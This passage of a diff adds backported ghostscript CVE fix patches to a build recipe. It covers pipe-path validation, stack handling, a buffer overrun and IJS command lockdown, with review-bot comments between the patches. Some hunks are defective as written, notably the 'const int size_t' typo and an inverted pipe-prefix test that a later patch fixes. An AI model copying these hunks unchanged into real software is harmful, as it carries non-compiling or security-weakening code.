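+- if (gp_validate_path(mem, fname, access) != 0)
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(f, iodev->dname, preflen);
++ memcpy(f + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, f, access) != 0)
+ return gs_error_invalidfileaccess;
+
+ /* First we try the open_handle method. */
+diff --git a/base/gp_msprn.c b/base/gp_msprn.c
+index ed4827968..746a974f7 100644
+--- a/base/gp_msprn.c
++++ b/base/gp_msprn.c
+@@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ unsigned long *ptid = &((tid_t *)(iodev->state))->tid;
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(pname, iodev->dname, preflen);
++ memcpy(pname + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, pname, access) != 0)
+ return gs_error_invalidfileaccess;
+
+ /* First we try the open_printer method. */
+diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c
+index f852c71fc..ba54cde66 100644
+--- a/base/gp_os2pr.c
++++ b/base/gp_os2pr.c
+@@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ FILE ** pfile, char *rfname, uint rnamelen)
+ {
+ os2_printer_t *pr = (os2_printer_t *)iodev->state;
+- char driver_name[256];
++ char driver_name[gp_file_name_sizeof];
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ const size_t preflen = strlen(iodev->dname);
++ const int size_t = strlen(fname);
++
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(driver_name, iodev->dname, preflen);
++ memcpy(driver_name + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, driver_name, access) != 0)
++ return gs_error_invalidfileaccess;
+
+ /* First we try the open_printer method. */
+ /* Note that the loop condition here ensures we don't
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 6dfed6cd5..318039fad 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s)
+ int
+ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+- char *fp, f[gp_file_name_sizeof];
+- const int pipe = 124; /* ASCII code for '|' */
+- const int len = strlen(fname);
+- int i, code;
++ char f[gp_file_name_sizeof];
++ int code;
+
+ /* Be sure the string copy will fit */
+- if (len >= gp_file_name_sizeof)
++ if (strlen(fname) >= gp_file_name_sizeof)
+ return gs_error_rangecheck;
+ strcpy(f, fname);
+- fp = f;
+ /* Try to rewrite any %d (or similar) in the string */
+ rewrite_percent_specifiers(f);
+- for (i = 0; i < len; i++) {
+- if (f[i] == pipe) {
+- fp = &f[i + 1];
+- /* Because we potentially have to check file permissions at two levels
+- for the output file (gx_device_open_output_file and the low level
+- fopen API, if we're using a pipe, we have to add both the full string,
+- (including the '|', and just the command to which we pipe - since at
+- the pipe_fopen(), the leading '|' has been stripped.
+- */
+- code = gs_add_control_path(mem, gs_permit_file_writing, f);
+- if (code < 0)
+- return code;
+- code = gs_add_control_path(mem, gs_permit_file_control, f);
+- if (code < 0)
+- return code;
+- break;
+- }
+- if (!IS_WHITESPACE(f[i]))
+- break;
+- }
+- code = gs_add_control_path(mem, gs_permit_file_control, fp);
++
++ code = gs_add_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+- return gs_add_control_path(mem, gs_permit_file_writing, fp);
++ return gs_add_control_path(mem, gs_permit_file_writing, f);
+ }
+
+ int
+ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+- char *fp, f[gp_file_name_sizeof];
+- const int pipe = 124; /* ASCII code for '|' */
+- const int len = strlen(fname);
+- int i, code;
++ char f[gp_file_name_sizeof];
++ int code;
+
+ /* Be sure the string copy will fit */
+- if (len >= gp_file_name_sizeof)
++ if (strlen(fname) >= gp_file_name_sizeof)
+ return gs_error_rangecheck;
+ strcpy(f, fname);
+- fp = f;
+ /* Try to rewrite any %d (or similar) in the string */
+- for (i = 0; i < len; i++) {
+- if (f[i] == pipe) {
+- fp = &f[i + 1];
+- /* Because we potentially have to check file permissions at two levels
+- for the output file (gx_device_open_output_file and the low level
+- fopen API, if we're using a pipe, we have to add both the full string,
+- (including the '|', and just the command to which we pipe - since at
+- the pipe_fopen(), the leading '|' has been stripped.
+- */
+- code = gs_remove_control_path(mem, gs_permit_file_writing, f);
+- if (code < 0)
+- return code;
+- code = gs_remove_control_path(mem, gs_permit_file_control, f);
+- if (code < 0)
+- return code;
+- break;
+- }
+- if (!IS_WHITESPACE(f[i]))
+- break;
+- }
+- code = gs_remove_control_path(mem, gs_permit_file_control, fp);
++ rewrite_percent_specifiers(f);
++
++ code = gs_remove_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+- return gs_remove_control_path(mem, gs_permit_file_writing, fp);
++ return gs_remove_control_path(mem, gs_permit_file_writing, f);
+ }
+
+ int
+--
+2.25.1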
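Review bot: In the gp_os2pr.c hunk, `const int size_t = strlen(fname);` declares a local named `size_t`, and the lines after it use `nlen`, which nothing in the hunk declares; the sibling hunks for gdevpipe.c, gp_mshdl.c and gp_msprn.c all write `const size_t nlen = strlen(fname);`, and this one should too. The file is OS/2-specific by name, so a Linux build of this recipe presumably never compiles it, which would explain how the typo survived, but the OS/2 printer path is left without a buildable validation step. The length guards also return `gs_error_invalidaccess` while the validation failure directly below returns `gs_error_invalidfileaccess`; one error code for both rejections would be easier for callers to handle. In gp_msprn.c, `pname` is declared outside the hunk, so its size cannot be checked against `gp_file_name_sizeof` from here.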
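--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
@@ -0,0 +1,65 @@
+From 6643ff0cb837db3eade489ffff21e3e92eee2ae0 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 28 Jan 2022 08:21:19 +0000
+Subject: [PATCH] [PATCH] Bug 703902: Fix op stack management in
+ sampled_data_continue()
+
+Replace pop() (which does no checking, and doesn't handle stack extension
+blocks) with ref_stack_pop() which does do all that.
+
+We still use pop() in one case (it's faster), but we have to later use
+ref_stack_pop() before calling sampled_data_sample() which also accesses the
+op stack.
+
+Fixes:
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=34675
+
+Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=2a3129365d3bc0d4a41f107ef175920d1505d1f7]
+CVE: CVE-2021-45949
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ psi/zfsample.c | 13 ++++++++-----
+ 1 file changed, 8 insertions(+), 5 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 0023fa4..f84671f 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -534,14 +534,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ data_ptr[bps * i + j] = (byte)(cv >> ((bps - 1 - j) * 8)); /* MSB first */
+ }
+ pop(num_out); /* Move op to base of result values */
+-
++ /* From here on, we have to use ref_stack_pop() rather than pop()
++ so that it handles stack extension blocks properly, before calling
++ sampled_data_sample() which also uses the op stack.
++ */
+ /* Check if we are done collecting data. */
+
+ if (increment_cube_indexes(params, penum->indexes)) {
+ if (stack_depth_adjust == 0)
+- pop(O_STACK_PAD); /* Remove spare stack space */
++ ref_stack_pop(&o_stack, O_STACK_PAD); /* Remove spare stack space */
+ else
+- pop(stack_depth_adjust - num_out);
++ ref_stack_pop(&o_stack, stack_depth_adjust - num_out);
+ /* Execute the closing procedure, if given */
+ code = 0;
+ if (esp_finish_proc != 0)
+@@ -554,11 +557,11 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ if ((O_STACK_PAD - stack_depth_adjust) < 0) {
+ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
+ check_op(stack_depth_adjust);
+- pop(stack_depth_adjust);
++ ref_stack_pop(&o_stack, stack_depth_adjust);
+ }
+ else {
+ check_ostack(O_STACK_PAD - stack_depth_adjust);
+- push(O_STACK_PAD - stack_depth_adjust);
++ ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust);
+ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+ make_null(op - i);
+ }
+--
+2.17.1
+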
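Review bot: In the second zfsample.c hunk the result of `ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust)` is discarded, and the loop that follows still writes through the local `op`, which the `push()` macro it replaces presumably kept in step with the stack top. If ref_stack_push can fail, or can move the top into an extension block, `make_null(op - i)` would then write through a stale pointer. I would capture the status, `code = ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust); if (code < 0) return code;`, and confirm that `op` is refreshed before the loop. sampled_data_continue starts and ends outside both hunks, so whether `op` is reloaded elsewhere cannot be seen from here.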
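--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
@@ -0,0 +1,54 @@
+From 37ed5022cecd584de868933b5b60da2e995b3179 Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Fri, 24 Mar 2023 13:19:57 +0000
+Subject: [PATCH] Graphics library - prevent buffer overrun in (T)BCP encoding
+
+Bug #706494 "Buffer Overflow in s_xBCPE_process"
+
+As described in detail in the bug report, if the write buffer is filled
+to one byte less than full, and we then try to write an escaped
+character, we overrun the buffer because we don't check before
+writing two bytes to it.
+
+This just checks if we have two bytes before starting to write an
+escaped character and exits if we don't (replacing the consumed byte
+of the input).
+
+Up for further discussion; why do we even permit a BCP encoding filter
+anyway ? I think we should remove this, at least when SAFER is true.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=37ed5022cecd584de868933b5b60da2e995b3179]
+CVE: CVE-2023-28879
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/sbcp.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/base/sbcp.c b/base/sbcp.c
+index 6b0383c..90784b5 100644
+--- a/base/sbcp.c
++++ b/base/sbcp.c
+@@ -1,4 +1,4 @@
+-/* Copyright (C) 2001-2019 Artifex Software, Inc.
++/* Copyright (C) 2001-2023 Artifex Software, Inc.
+ All Rights Reserved.
+
+ This software is provided AS-IS with no warranty, either express or
+@@ -50,6 +50,14 @@ s_xBCPE_process(stream_state * st, stream_cursor_read * pr,
+ byte ch = *++p;
+
+ if (ch <= 31 && escaped[ch]) {
++ /* Make sure we have space to store two characters in the write buffer,
++ * if we don't then exit without consuming the input character, we'll process
++ * that on the next time round.
++ */
++ if (pw->limit - q < 2) {
++ p--;
++ break;
++ }
+ if (p == rlimit) {
+ p--;
+ break;
+--
+2.25.1
+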
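--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
@@ -0,0 +1,145 @@
+From 5e65eeae225c7d02d447de5abaf4a8e6d234fcea Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 7 Jun 2023 10:23:06 +0100
+Subject: [PATCH] Bug 706761: Don't "reduce" %pipe% file names for permission validation
+
+For regular file names, we try to simplfy relative paths before we use them.
+
+Because the %pipe% device can, effectively, accept command line calls, we
+shouldn't be simplifying that string, because the command line syntax can end
+up confusing the path simplifying code. That can result in permitting a pipe
+command which does not match what was originally permitted.
+
+Special case "%pipe" in the validation code so we always deal with the entire
+string.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=505eab7782b429017eb434b2b95120855f2b0e3c]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 31 +++++++++++++++++++--------
+ base/gslibctx.c | 56 ++++++++++++++++++++++++++++++++++++-------------
+ 2 files changed, 64 insertions(+), 23 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index c4fffae..09ac6b3 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1046,16 +1046,29 @@ gp_validate_path_len(const gs_memory_t *mem,
+ && !memcmp(path + cdirstrl, dirsepstr, dirsepstrl)) {
+ prefix_len = 0;
+ }
+- rlen = len+1;
+- bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+- if (bufferfull == NULL)
+- return gs_error_VMerror;
+-
+- buffer = bufferfull + prefix_len;
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
+
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len+1;
++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
++ if (bufferfull == NULL)
++ return gs_error_VMerror;
++
++ buffer = bufferfull + prefix_len;
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+ while (1) {
+ switch (mode[0])
+ {
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 20c5eee..355c0e3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -719,14 +719,28 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+ return gs_error_rangecheck;
+ }
+
+- rlen = len+1;
+- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+- if (buffer == NULL)
+- return gs_error_VMerror;
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len + 1;
+
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_add_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+
+ n = control->num;
+ for (i = 0; i < n; i++)
+@@ -802,14 +816,28 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+ return gs_error_rangecheck;
+ }
+
+- rlen = len+1;
+- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+- if (buffer == NULL)
+- return gs_error_VMerror;
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len+1;
+
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_remove_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+
+ n = control->num;
+ for (i = 0; i < n; i++) {
+--
+2.25.1
+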
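Review bot: In the `else` branch of all three hunks, a failed `gp_file_name_reduce()` returns `gs_error_invalidfileaccess` without releasing the buffer allocated just above it, so every path rejected at that point leaks the allocation. In `gp_validate_path_len` the path being checked may come from the document being processed, so the leak can repeat as often as the input asks. Freeing before the return would close it, e.g. `gs_free_object(mem->thread_safe_memory, bufferfull, "gp_validate_path");` in gpmisc.c and the matching call on `core->memory` in the two gslibctx.c functions. Separately, the `memcmp(path, "%pipe", 5) != 0` test is inverted as written and is only corrected by CVE-2023-36664-2.patch, so this patch must never be carried without that one. All three functions start and end outside the hunks.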
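--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
@@ -0,0 +1,60 @@
+From fb342fdb60391073a69147cb71af1ac416a81099 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 14 Jun 2023 09:08:12 +0100
+Subject: [PATCH] Bug 706778: 706761 revisit
+
+Two problems with the original commit. The first a silly typo inverting the
+logic of a test.
+
+The second was forgetting that we actually actually validate two candidate
+strings for pipe devices. One with the expected "%pipe%" prefix, the other
+using the pipe character prefix: "|".
+
+This addresses both those.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=fb342fdb60391073a69147cb71af1ac416a81099]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 2 +-
+ base/gslibctx.c | 4 ++--
+ 2 files changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 09ac6b3..01d449f 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1050,7 +1050,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 355c0e3..d8f74a3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -722,7 +722,7 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+@@ -819,7 +819,7 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+--
+2.25.1
+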
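Review bot: The corrected test reads `path[0]` before any length check, so when `len` is 0 each of the three functions inspects a byte the caller did not include in the path. Writing it as `if ((len > 0 && path[0] == '|') || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {` keeps the read inside the given length. Whether a zero `len` can reach these lines depends on checks above the hunks, which are not visible here. The prefix compare also stops at five bytes, so any name beginning `%pipe` skips reduction, not only `%pipe%`; if that is intended, the comment above the test should say so.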
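--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
@@ -0,0 +1,62 @@
+From 4ceaf92815302863a8c86fcfcf2347e0118dd3a5 Mon Sep 17 00:00:00 2001
+From: Ray Johnston <ray.johnston@artifex.com>
+Date: Tue, 22 Sep 2020 13:10:04 -0700
+Subject: [PATCH] Fix gp_file allocations to use thread_safe_memory.
+
+The gpmisc.c does allocations for gp_file objects and buffers used by
+gp_fprintf, as well as gp_validate_path_len. The helgrind run with
+-dBGPrint -dNumRenderingThreads=4 and PCL input showed up the gp_fprintf
+problem since the clist rendering would call gp_fprintf using the same
+allocator (PCL's chunk allocator which is non_gc_memory). The chunk
+allocator is intentionally not thread safe (for performance).
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4ceaf92815302863a8c86fcfcf2347e0118dd3a5]
+CVE: CVE-2023-36664 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 34cd71f..c4fffae 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -435,7 +435,7 @@ generic_pwrite(gp_file *f, size_t count, gs_offset_t offset, const void *buf)
+
+ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t size, const char *cname)
+ {
+- gp_file *file = (gp_file *)gs_alloc_bytes(mem->non_gc_memory, size, cname ? cname : "gp_file");
++ gp_file *file = (gp_file *)gs_alloc_bytes(mem->thread_safe_memory, size, cname ? cname : "gp_file");
+ if (file == NULL)
+ return NULL;
+
+@@ -449,7 +449,7 @@ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t
+ memset(((char *)file)+sizeof(*prototype),
+ 0,
+ size - sizeof(*prototype));
+- file->memory = mem->non_gc_memory;
++ file->memory = mem->thread_safe_memory;
+
+ return file;
+ }
+@@ -1047,7 +1047,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ prefix_len = 0;
+ }
+ rlen = len+1;
+- bufferfull = (char *)gs_alloc_bytes(mem->non_gc_memory, rlen + prefix_len, "gp_validate_path");
++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+ if (bufferfull == NULL)
+ return gs_error_VMerror;
+
+@@ -1093,7 +1093,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ break;
+ }
+
+- gs_free_object(mem->non_gc_memory, bufferfull, "gp_validate_path");
++ gs_free_object(mem->thread_safe_memory, bufferfull, "gp_validate_path");
+ #ifdef EACCES
+ if (code == gs_error_invalidfileaccess)
+ errno = EACCES;
+--
+2.25.1
+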
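--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
@@ -0,0 +1,62 @@
+From 8b0f20002536867bd73ff4552408a72597190cbe Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Thu, 24 Aug 2023 15:24:35 +0100
+Subject: [PATCH] IJS device - try and secure the IJS server startup
+
+Bug #707051 ""ijs" device can execute arbitrary commands"
+
+The problem is that the 'IJS' device needs to start the IJS server, and
+that is indeed an arbitrary command line. There is (apparently) no way
+to validate it. Indeed, this is covered quite clearly in the comments
+at the start of the source:
+
+ * WARNING: The ijs server can be selected on the gs command line
+ * which is a security risk, since any program can be run.
+
+Previously this used the awful LockSafetyParams hackery, which we
+abandoned some time ago because it simply couldn't be made secure (it
+was implemented in PostScript and was therefore vulnerable to PostScript
+programs).
+
+This commit prevents PostScript programs switching to the IJS device
+after SAFER has been activated, and prevents changes to the IjsServer
+parameter after SAFER has been activated.
+
+SAFER is activated, unless explicitly disabled, before any user
+PostScript is executed which means that the device and the server
+invocation can only be configured on the command line. This does at
+least provide minimal security against malicious PostScript programs.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5]
+CVE: CVE-2023-43115
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ devices/gdevijs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/devices/gdevijs.c b/devices/gdevijs.c
+index 3d337c5..e50d69f 100644
+--- a/devices/gdevijs.c
++++ b/devices/gdevijs.c
+@@ -934,6 +934,9 @@ gsijs_finish_copydevice(gx_device *dev, const gx_device *from_dev)
+ static const char rgb[] = "DeviceRGB";
+ gx_device_ijs *ijsdev = (gx_device_ijs *)dev;
+
++ if (ijsdev->memory->gs_lib_ctx->core->path_control_active)
++ return_error(gs_error_invalidaccess);
++
+ code = gx_default_finish_copydevice(dev, from_dev);
+ if(code < 0)
+ return code;
+@@ -1363,7 +1366,7 @@ gsijs_put_params(gx_device *dev, gs_param_list *plist)
+ if (code >= 0)
+ code = gsijs_read_string(plist, "IjsServer",
+ ijsdev->IjsServer, sizeof(ijsdev->IjsServer),
+- dev->LockSafetyParams, is_open);
++ ijsdev->memory->gs_lib_ctx->core->path_control_active, is_open);
+
+ if (code >= 0)
+ code = gsijs_read_string_malloc(plist, "DeviceManufacturer",
+--
+2.25.1
+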
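Review bot: The guard added to `gsijs_finish_copydevice` has no comment, and a bare `return_error(gs_error_invalidaccess)` at the top of a copy hook is easy to mistake for a leftover. I would add `/* IjsServer is an arbitrary command line, so refuse to create the device once path control (SAFER) is active. */` above it. The same chain `ijsdev->memory->gs_lib_ctx->core->path_control_active` is repeated in `gsijs_put_params`; reading it once into a local in each function would make both uses easier to audit. Both functions start and end outside the hunks, so whether `ijsdev->memory` is always set at these points cannot be confirmed from here.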
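--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
@@ -0,0 +1,51 @@
+From 7861fcad13c497728189feafb41cd57b5b50ea25 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 12 Feb 2021 10:34:23 +0000
+Subject: [PATCH] oss-fuzz 30715: Check stack limits after function evaluation.
+
+During function result sampling, after the callout to the Postscript
+interpreter, make sure there is enough stack space available before pushing
+or popping entries.
+
+In thise case, the Postscript procedure for the "function" is totally invalid
+(as a function), and leaves the op stack in an unrecoverable state (as far as
+function evaluation is concerned). We end up popping more entries off the
+stack than are available.
+
+To cope, add in stack limit checking to throw an appropriate error when this
+happens.
+CVE: CVE-2021-45944
+Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25]
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ psi/zfsample.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 290809405..652ae02c6 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -551,9 +551,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ } else {
+ if (stack_depth_adjust) {
+ stack_depth_adjust -= num_out;
+- push(O_STACK_PAD - stack_depth_adjust);
+- for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+- make_null(op - i);
++ if ((O_STACK_PAD - stack_depth_adjust) < 0) {
++ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
++ check_op(stack_depth_adjust);
++ pop(stack_depth_adjust);
++ }
++ else {
++ check_ostack(O_STACK_PAD - stack_depth_adjust);
++ push(O_STACK_PAD - stack_depth_adjust);
++ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
++ make_null(op - i);
++ }
+ }
+ }
+
+--
+2.25.1
+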
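Review bot: `Upstream-Status: Backported [...]` in this patch header does not use the status keyword the other patches in the commit use, which is `Backport`; CVE-2021-45949.patch has the same `Backported` spelling. The `CVE: CVE-2021-45944` line also follows the message body with no blank line, so it reads as part of the last paragraph. I would change the trailer to `Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25]` and put a blank line before `CVE:`. The file name carries no CVE id, so the `CVE:` tag is the only link between this patch and CVE-2021-45944 and is worth keeping well-formed.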
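--- a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
+++ b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
@@ -19,6 +19,10 @@ DEPENDS_class-native = "libpng-native"
 UPSTREAM_CHECK_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases"
 UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)\.tar"
 
+# The jpeg issue in the CVE is present in the gs jpeg sources
+# however we use an external jpeg which doesn't have the issue.
+CVE_CHECK_WHITELIST += "CVE-2013-6629"
+
 def gs_verdir(v):
  return "".join(v.split("."))
 
@@ -29,12 +33,24 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d
  file://do-not-check-local-libpng-source.patch \
  file://avoid-host-contamination.patch \
  file://mkdir-p.patch \
+ file://CVE-2020-15900.patch \
+ file://check-stack-limits-after-function-evalution.patch \
+ file://CVE-2021-45949.patch \
+ file://CVE-2021-3781_1.patch \
+ file://CVE-2021-3781_2.patch \
+ file://CVE-2021-3781_3.patch \
+ file://CVE-2023-28879.patch \
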